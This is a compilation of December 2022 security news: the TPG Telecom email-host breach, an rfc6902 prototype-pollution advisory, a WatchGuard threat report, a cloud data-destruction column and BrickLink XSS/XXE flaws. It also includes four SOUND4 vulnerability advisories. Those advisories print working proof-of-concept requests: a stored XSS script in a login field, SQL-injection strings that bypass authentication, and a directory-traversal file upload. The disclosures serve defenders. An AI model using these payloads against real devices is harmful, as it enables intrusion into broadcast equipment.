By Habiba Rashid
The TGP telecom giant based in North Ryde, Australia revealed that up to 15,000 iiNet and Westnet business customers have been impacted by the breach.
This is a post from HackRead.com Read the original post: Hackers Breach TPG Telecoms’ Email Host to Steal Client Data

TPG Telecom claims that the hackers seemed to be searching for the customers’ cryptocurrency and financial information.

On 14th December, 2022, Australia’s second-largest telecommunications company, TPG Telecom, announced that an email-hosting service used by 15,000 iiNet and Westnet business customers was compromised.

It is worth noting that iiNet is an Australian internet service provider (ISP) acquired by TPG in September 2015 for $1.56 billion, while Westnet is a telecom company also owned by TPG.

TPG’s cybersecurity adviser, **Google-owned Mandiant**, informed the company that they found evidence suggesting unauthorized access to a Hosted Exchange Service during a forensic review. 

The company reported that the hackers seemed to be searching for the customers’ cryptocurrency and financial information. Further details were not given but an investigation into the attack continues. 

In a **notification** (PDF), TPG Telecom said that, “We apologize unreservedly to the affected iiNet and Westnet Hosted Exchange business customers. We continue to investigate the incident and any potential impact on customers and are advising customers to take necessary precautions.”

TPG stated that it has taken steps to cut off the access for the hacker. They also confirmed that no home or personal iiNet or Westnet products were impacted in the incident. 

This news comes just days after TPG’s biggest rival Telstra **published** details of 130,000 customers due to a “misalignment of databases”. 

It is worth mentioning that **in May 2021**, Telstra was also a victim of the Avaddon ransomware gang, who gained access to tens of thousands of the company’s SIM cards.

Sample data leaked by Avaddon hackers on their website (Image credit: Hackread.com)

Australian companies have recently become a hotspot for threat actors to target due to some initial attacks on companies such as Singtel-owned **Optus**, **Medibank** and a second Singtel subsidiary which made it apparent that Australian firms had no adequate security system in place. 

Seeing an onslaught of cyber attacks targeting Australian entities, the country proposed tougher penalties for companies that failed to properly protect their customers’ data.

**MORE TELECOM SECURITY NEWS**

1.  **Hacker extracts Canadian Telecom Firm’s data after rebuttal**
2.  **Spanish telecom firm MasMovil hit by Revil ransomware gang**
3.  **Telecom giant behind routing SMS discloses years-long breach**
4.  **Police arrest minor over A1 Telecom data breach, ransom demand**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Hackers Breach TPG Telecoms’ Email Host to Steal Client Data

A vulnerability classified as problematic has been found in chbrown rfc6902. This affects an unknown part of the file pointer.ts. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The exploit has been disclosed to the public and may be used. The name of the patch is c006ce9faa43d31edb34924f1df7b79c137096cf. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215883.

**npm package rfc6902 vulnerable to Prototype Pollution**

Moderate severity GitHub Reviewed Published Dec 15, 2022 • Updated Dec 15, 2022

GHSA-p495-jxh2-wrfg: npm package rfc6902 vulnerable to Prototype Pollution

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2021-4245: Fix prototype pollution vulnerability · chbrown/rfc6902@c006ce9

New research also analyzes the commoditization of adversary-in-the-middle attacks, JavaScript obfuscation in exploit kits, and a malware family with Gothic Panda ties.

**SEATTLE – December 15, 2022** **–** WatchGuard® Technologies, a global leader in unified cybersecurity, today released its latest quarterly Internet Security Report, detailing the top malware trends, and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers in Q3 2022. Key findings from the data reveal the quarter’s top malware threat was detected exclusively over encrypted connections, ICS attacks are maintaining popularity, LemonDuck malware is evolving beyond cryptominer delivery, a Minecraft cheat engine is delivering a malicious payload, and much more.“We can’t emphasize enough how important it is for HTTPS inspection to be enabled, even if it requires some tuning and exceptions to do properly. The majority of malware arrives over encrypted HTTPS, and not inspecting it means you’re missing those threats,” said Corey Nachreiner, chief security officer at WatchGuard Technologies. “Rightfully so, the big prizes for attackers like an Exchange server or a SCADA management system deserve extraordinary attention as well this quarter. When a patch is available, it’s important to update immediately, as attackers will eventually benefit from any organization that has yet to implement the latest patch.” 

Other key findings from the Q3 Internet Security Report include:

*   The vast majority of malware arriving over encrypted connections – Although Agent.IIQ placed third in the normal top 10 malware list this quarter, it landed in the #1 spot at the top of the encrypted malware list for Q3. In fact, if you look at the detections for it on both of these lists, you’ll see all Agent.IIQ detections come from encrypted connections. In Q3, if a Firebox was inspecting encrypted traffic, 82% of the malware it detected was through that encrypted connection, leaving only a meager 18% detected without encryption. If you’re not inspecting encrypted traffic on your Firebox, it’s very likely that this average ratio remains true, and you are missing a huge portion of malware. Hopefully, you at least have endpoint protection implemented for a chance to catch it further down the cyber kill chain.

*   ICS and SCADA systems remain trending attack targets – New to the top 10 network attacks list this quarter is a SQL injection-type attack that affected several vendors. One of these companies is Advantech, whose WebAccess portal is used for SCADA systems across a variety of critical infrastructure. Another serious exploit in Q3, which also appeared in the top five network attacks by volume, involved Schneider Electric's U.motion Builder software versions 1.2.1 and prior. This is a stark reminder that attackers aren’t quietly waiting for an opportunity – rather, they are actively seeking system compromise wherever possible.
*   Exchange server vulnerabilities continuing to pose risk – The most recent CVE among the Threat Lab’s new signatures this quarter, CVE-2021-26855, is a Microsoft Exchange Server Remote Code Execution (RCE) vulnerability for on-premises servers. This RCE vulnerability was given a 9.8 CVE score and is known to have been exploited. The date and severity of CVE-2021-26855 should also ring a bell, as it is one of the exploits used by the group HAFNIUM. While most Exchange servers affected by it have likely been patched by now, _most_ does not equate to _all_. Therefore, risks remain.

*   Threat actors targeting seekers of free software – Fugrafa downloads malware that injects malicious code. This quarter, the Threat Lab examined a sample of it that was found in a cheat engine for the popular game Minecraft. While the file shared primarily on Discord claims to be the Minecraft cheat engine Vape V4 Beta, that’s not all it contains. Agent.FZUW has some similarities to Variant.Fugrafa, but instead of installation through a cheat engine, the file itself pretends to have cracked software. The Threat Lab discovered this particular sample has connections with Racoon Stealer, a cryptocurrency hacking campaign used to hijack account information from cryptocurrency exchange services.

*   LemonDuck malware evolving beyond cryptominer delivery – Even with a dip in total blocked or tracked malware domains for the third quarter of 2022, it is easy to see that attacks on unsuspecting users are still high. With three new additions to the top malware domains list – two of which were former LemonDuck malware domains, and the other part of an Emotet classified domain – Q3 saw more malware and attempted malware sites that were newer domains than usual. This trend will change and modify with the landscape of cryptocurrency in turmoil as attackers look for other venues to trick users. Keeping DNS protection enabled is a way to monitor and block unsuspecting users from allowing malware or other serious issues into your organization.

*   JavaScript obfuscation in exploit kits – Signature 1132518, a generic vulnerability for detecting JavaScript Obfuscation attacks against browsers, was the only new addition to the most-widespread network attack signatures list this quarter. JavaScript is a common vector for attacking users and threat actors use JavaScript-based exploit kits all the time – in malvertising, watering hole and phishing attacks, just to name a few. As the defensive fortifications have improved on browsers, so have attackers’ ability to obfuscate malicious JavaScript code.

*   Anatomy of commoditized adversary-in-the-middle attacks – While multi-factor authentication (MFA) is undeniably the single best technology you can deploy to protect against the bulk of authentication attacks, it is not on its own a silver bullet against all attack vectors. Cyber adversaries have made this clear with the rapid rise and commoditization of adversary-in-the-middle (AitM) attacks, and the Threat Lab’s deep dive on EvilProxy, the top security incident of Q3, shows just how malicious actors are beginning to pivot to more sophisticated AitM techniques. Like the Ransomware as a Service offering made popular in recent years, the September 2022 release of an AitM toolkit called EvilProxy has significantly lowered the barrier of entry for what was previously a sophisticated attack technique. From a defensive standpoint, successfully combatting this kind of AitM attack technique requires a mix of both technical tools and user awareness.
*   A malware family with Gothic Panda ties – The Threat Lab’s Q2 2022 report described how Gothic Panda—a state-sponsored threat actor connected to China’s Ministry of State Security—was known to use one of the top malware detections from that quarter. Interestingly, the top encrypted malware list for Q3 includes a malware family called Taidoor, which was not only created by Gothic Panda but has only been seen used by Chinese government cyber actors. While this malware typically focuses on targets in Japan and Taiwan in general, the Generic.Taidoor sample analyzed this quarter was found primarily targeting organizations in France, suggesting that some Fireboxes in this region may have detected and blocked parts of a state-sponsored cyberattack.
*   New ransomware and extortion groups in the wild –Additionally this quarter, the Threat Lab is excited to announce a new, concerted effort to track current ransomware extortion groups and build out its threat intelligence capabilities to provide more ransomware-related information in future reports. LockBit tops the list for Q3 with over 200 public extortions on their dark web page – nearly four times more than that of Basta, the second most prolific ransomware group WatchGuard observed this quarter.WatchGuard’s quarterly research reports are based on anonymized Firebox Feed data from active WatchGuard Fireboxes whose owners have opted to share data in direct support of the Threat Lab’s research efforts. In Q3, WatchGuard blocked a total of more than 17.3 million malware variants (211 per device) and more than 2.3 million network threats (28 per device). The full report includes details on additional malware and network trends from Q3 2022, recommended security strategies, critical defense tips for businesses of all sizes and in any sector, and more.
    
    For a detailed view of WatchGuard’s research, read the complete Q3 2022 Internet Security Report here.
    
    About WatchGuard Technologies, Inc.
    
    WatchGuard® Technologies, Inc. is a global leader in unified cybersecurity. Our Unified Security Platform® approach is uniquely designed for managed service providers to deliver world-class security that increases their business scale and velocity while also improving operational efficiency. Trusted by more than 17,000 security resellers and service providers to protect more than 250,000 customers, the company’s award-winning products and services span network security and intelligence, advanced endpoint protection, multi-factor authentication, and secure Wi-Fi. Together, they offer five critical elements of a security platform: comprehensive security, shared knowledge, clarity & control, operational alignment, and automation. The company is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.
    

For additional information, promotions and updates, follow WatchGuard on Twitter (@WatchGuard), on Facebook, or on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org. 

Subscribe to The 443 – Security Simplified podcast at Secplicity.org, or wherever you find your favorite podcasts.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

WatchGuard Threat Lab Report Finds Top Threat Arriving Exclusively Over Encrypted Connections

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username persistent cross site scripting vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Stored Cross-Site ScriptingVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated stored XSS vulnerabilitythat results in stored JS code and authentication bypass. The issue is triggeredwhen input passed to the 'username' parameter is not properly sanitized beforebeing returned to the user. This can be exploited to execute arbitrary HTMLand script code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5731Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5731.php26.09.2022--POST /index.php HTTP/1.1username="><script>confirm(251)</script>&password=zeroscience"

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Persistent Cross Site Scripting

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an unauthenticated directory traversal file write vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Directory Traversal File Write ExploitVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated directory traversalfile write vulnerability. Input passed through the 'filename' POST parametercalled by the 'upgrade.php' script is not properly verified before being usedto upload .upgbox Firmware files. This can be exploited to write to arbitrarylocations on the system via directory traversal attacks.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5730Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5730.php26.09.2022--POST /cgi-bin/upload.cgi HTTP/1.1Host: RAAAADIOOOContent-Type: multipart/form-data; boundary=----zzzzzUser-Agent: TheViewing/05Accept-Encoding: gzip, deflate------zzzzzContent-Disposition: form-data; name="upgfile"; filename="../../../../../../../tmp/pwned"Content-Type: application/octet-streamt00t------zzzzzContent-Disposition: form-data; name="submit"Do it------zzzzz--

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Directory Traversal / File Write

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'username' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5727Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php26.09.2022--POST /index.php HTTP/1.1username='+joxy--+z&password=05C13NCE

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username SQL Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password SQL injection vulnerability that allows for authentication bypass.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Authentication BypassVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an SQL Injection vulnerability. Inputpassed through the 'password' POST parameter in 'index.php' is not properlysanitised before being returned to the user or used in SQL queries. Thiscan be exploited to manipulate SQL queries by injecting arbitrary SQL codeand bypass the authentication mechanism.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5726Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5726.php26.09.2022--POST /index.php HTTP/1.1username=t00t&password='+joxy--+z

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x password SQL Injection

It's time for on-the-record answers to questions about data destruction in cloud environments. Without access, how do you verify data has been destroyed? Do processes meet DoD standards, or do we need to adjust standards to meet reality?

These days, most big companies and many midsize ones have some form of a data-governance program, typically including policies for data retention and destruction. They have become an imperative because of increasing attacks on customer data and also state and national laws mandating protection of customer data. The old mind set of "Keep everything, forever" has changed to "If you don't have it, you can't breach it."

In some ways, managing data-retention policies has never been easier to implement in the cloud. Cloud vendors often have easy templates and click-box settings to retain your data for a specific period and then either move it to quasi-offline cold digital storage or straight to the bit bucket (deletion). Just click, configure, and move on to the next information security priority.

**Just Click Delete?**

However, I'm going to ask an awkward question, one that has been burning in my mind for a while. What really happens to that data once you click "delete" on a cloud service? In the on-premises, hardware world, we all know the answer; it would simply be deregistered on the disk it resides on. The "deleted" data still sits on the hard drive, gone from the operating system view and waiting to be overwritten when the space is needed. To truly erase it, extra steps or special software are needed to overwrite the bits with random zeros and ones. In some cases, this needs to be done multiple times to truly wipe out the phantom electronic traces of the deleted data.

And if you do business with the US government or other regulated entities, you may be required to comply with Department of Defense standard 5220.22-M, which contains specifics on data destruction requirements for contractors. These practices are common, even if not required by regulations. You don't want data you don't need any more coming back to haunt you in the event of a breach. The breach of the Twitch game-streaming service, in which hackers were able to gain access to basically all of its data going back almost to the inception of the company — including income and other personal details about its well-paid streaming clients — is a cautionary tale here, along with reports of other breaches of abandoned or orphaned data files in the last few years.

**Lack of Access to Verify**

So, while the policies are easier to set and manage in most cloud services versus on-premises servers, assuring it is properly done to the DoD standard is much harder or impossible on cloud services. How do you do a low-level disk overwrite of data on cloud infrastructure where you don't have physical access to the underlying hardware? The answer is that you can't, at least not the way we used to do it — with software utilities or outright destruction of the physical disk drive. Neither AWS, Azure, or Google Cloud Services offer any options or services that do this, not even on their dedicated instances, which run on separate hardware. You simply don't have the level of access needed to do it.

Outreach to the major services either was ignored or answered with generic statements about how they protect your data. What happens to data that is "released" in a cloud service such as AWS or Azure? Is it simply sitting on a disk, nonindexed and waiting to be overwritten, or is it put through some kind of "bit blender" to render it unusable before being returned to available storage on the service? No one, at this point, seems to know or be willing to say on the record.

**Adjust to New Reality**

We must develop a cloud-compatible way of doing destruction that meets the DoD standards, or we must stop pretending and adjust our standards to this new reality.

Maybe cloud providers can come up with a service to provide this capability, since only they have direct access to the underlying hardware. They have never been shy about inventing new services to charge for, and certainly plenty of companies would be eager to pay for such a service, if the appropriate certificates of destruction were provided. It would probably be cheaper than fees charged by some of the companies providing certified physical-destruction services.

Amazon, Azure, Google, and any major cloud service (even software-as-a-service providers) need to address these issues with real answers, not obfuscation and marketing-speak. Until then, we will just be pretending and hoping, praying some brilliant hacker doesn't figure out how to access this orphaned data, if they haven't already. Either way, the hard questions on cloud data destruction need to be asked and answered, sooner rather than later.

Data Destruction Policies in the Age of Cloud Computing

Attackers also could breach internal production data to compromise a corporate network using vulnerabilities found in the BrickLink online platform.

API flaws in a widely used Lego online marketplace could have allowed attackers to take over user accounts, leak sensitive data stored on the platform, and even gain access to internal production data to compromise corporate services, researchers have found.

Researchers from Salt Labs discovered the vulnerabilities in BrickLink, a digital resale platform owned by the Lego Group for buying and selling second-hand Legos, demonstrating that — technology-wise, anyway — not all of the company's toy pieces snap perfectly into place.

Salt Security's research arm discovered both vulnerabilities by investigating areas of the site that support user input fields, Shiran Yodev, Salts Labs security researcher, revealed in a report published on Dec. 15.

The researchers found each of the core flaws that could be exploited for attack in parts of the site that allow for user input, which they said is often a place where API security issues — a complex and costly problem for organizations — arise.

One flaw was a cross-site scripting (XSS) vulnerability that enabled them to inject and execute code on a victim end user’s machine through a crafted link, they said. The other allowed for the execution of an XML External Entity (XXE) injection attack, where an XML input containing a reference to an external entity is processed by a weakly configured XML parser.

**API Weaknesses Abound**

The researchers were careful to stress that they didn't intend to single out Lego as a particularly negligent technology provider — on the contrary, API flaws in Internet-facing applications are incredibly common, they said.

There is a key reason for that, Yodev tells Dark Reading**:** No matter the competency of an IT design and development team, API security is a new discipline that all Web developers and designers are still figuring out.

"We readily find these kinds of serious API vulnerabilities in all sorts of online services we investigate," he says. "Even companies with the most robust application security tooling and advanced security teams frequently have gaps in their API business logic."

And while both flaws could have been discovered easily through pre-production security testing, "API security is still an afterthought for many organizations," notes Scott Gerlach, co-founder and CSO at StackHawk, an API security testing provider.

"It usually doesn't come into play until after an API has already been deployed, or in other cases, organizations are using legacy tooling not built to test APIs thoroughly, leaving vulnerabilities like cross-site scripting and injection attacks undiscovered," he says.

**Personal Interest, Rapid Response**

The research to investigate Lego's BrickLink was not meant to shame and blame Lego or "make anyone look bad," but rather to demonstrate "how common these mistakes are and to educate companies on steps they can take to protect their key data and services," Yodev says.

The Lego Group is the world’s largest toy company and a massively recognizable brand that can indeed draw people's attention to the issue, the researchers said. The company earns billions of dollars in revenue per year, not only because of children's interest in using Legos but also as a result of an entire adult hobbyist community — of which Yodev admits he is one — that also collects and builds Lego sets.

Because of the popularity of Legos, BrickLink has more than 1 million members that use its site.

The researchers discovered the flaws on Oct. 18, and, to its credit, Lego responded quickly when Salt Security revealed the issues to the company on Oct. 23, confirming the disclosure within two days. Tests conducted by Salt Labs confirmed shortly after, on Nov. 10, that the issues had been resolved, the researchers said.

"However, due to Lego's internal policy, they cannot share any information regarding reported vulnerabilities, and we are therefore unable to positively confirm," Yodev acknowledges. Moreover, this policy also prevents Salt Labs from confirming or denying if attackers exploited either of the flaws in the wild, he says.

**Snapping Together the Vulnerabilities**

Researchers found the XSS flaw in the “Find Username” dialog box of BrickLinks' coupon search functionality, leading to an attack chain using a session ID exposed on a different page, they said.

"In the 'Find Username' dialog box, a user can write a free text that eventually ends up rendered into the webpage’s HTML," Yodev wrote. "Users can abuse this open field to input text that can lead to an XSS condition."

Though the researchers couldn't use the flaw on its own to mount an attack, they found an exposed session ID on a different page that they could combine with the XSS flaw to hijack a user's session and achieve account takeover (ATO), they explained.

"Bad actors could have used these tactics for full account takeover or to steal sensitive user data," Yodev wrote.

Researchers uncovered the second flaw in another part of the platform that receives direct user input, called "Upload to Wanted List," which allows BrickLink users to upload a list of wanted Lego parts and/or sets in XML format, they said.

The vulnerability was present due to how the site's XML parser uses XML External Entities, a part of the XML standard that defines a concept called an entity, or a storage unit of some type, Yodev explained in the post. In the case of the BrickLinks page, the implementation was vulnerable to a condition in which the XML processor may disclose confidential information that's typically not accessible by the application, he wrote.

Researchers exploited the flaw to mount an XXE injection attack that allows a system-file read with the permissions of the running user. This type of attack also can allow for an additional attack vector using server-side request forgery, which might enable an attacker to gain credentials for an application running on Amazon Web Services and thus breach an internal network, the researchers said.

**Avoiding Similar API Flaws**

Researchers shared some advice to help enterprises avoid creating similar API issues that can be exploited on Internet-facing applications in their own environments.

In the case of API vulnerabilities, attackers can inflict the most damage if they combine attacks on various issues or conduct them in quick succession, Yodev wrote, something the researchers demonstrated is the case with the Lego flaws.

To avoid the scenario created with the XSS flaw, organizations should follow the rule of thumb "to never trust user input," Yodev wrote. "Input should be properly sanitized and escaped," he added, referring organizations to the XSS Prevention Cheat Sheet by the Open Web Application Security Project (OWASP) for more information on this topic.

Organizations also should be careful in their implementation of session ID on Web-facing sites because it's "a common target for hackers," who can leverage it for session hijacking and account takeover, Yodev wrote.

"It is important to be very careful when handling it and not expose or misuse it for other purposes," he explained.

Finally, the easiest way to stop XXE injection attacks like the one researchers demonstrated is to completely disable External Entities in your XML parser’s configuration, the researchers said. The OWASP has another useful resource called the XXE Prevention Cheat Sheet that can guide organizations in this task, they added.

Tag

#perl